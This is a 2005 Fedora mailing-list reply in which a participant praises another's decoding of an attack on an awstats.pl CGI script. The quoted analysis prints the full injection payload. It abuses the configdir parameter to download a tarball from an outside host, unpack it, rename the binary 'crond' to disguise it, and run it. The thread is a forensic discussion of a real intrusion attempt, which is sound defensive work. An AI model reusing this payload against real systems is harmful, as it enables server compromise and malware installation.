Security Breach
Brian Fahrlander
brian at fahrlander.net
Fri Mar 4 18:51:12 UTC 2005
On Fri, 2005-03-04 at 17:58 +0000, Paul Howarth wrote:
> Replace the url-encoded characters and you get:
>
> /cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget
> zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv
> mech crond;export PATH=;crond;echo e_exp;%00
>
> So the attacker has tricked the script into executing a set of shell
> commands, which include changing directory to /tmp, downloading a
> tarball from a Romanian site, extracting that tarball and then executing
> a program from the downloaded and extracted tarball, after renaming it
> to "crond" in an effort to disguise it.
Damned fine research. Good job; I'm impressed.
--
------------------------------------------------------------------------
Brian Fahrländer Christian, Conservative, and Technomad
Evansville, IN http://www.fahrlander.net
ICQ: 5119262 AIM: WheelDweller
------------------------------------------------------------------------
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part
URL: <http://listman.redhat.com/archives/fedora-list/attachments/20050304/69ab7386/attachment-0001.sig>
More information about the fedora-list
mailing list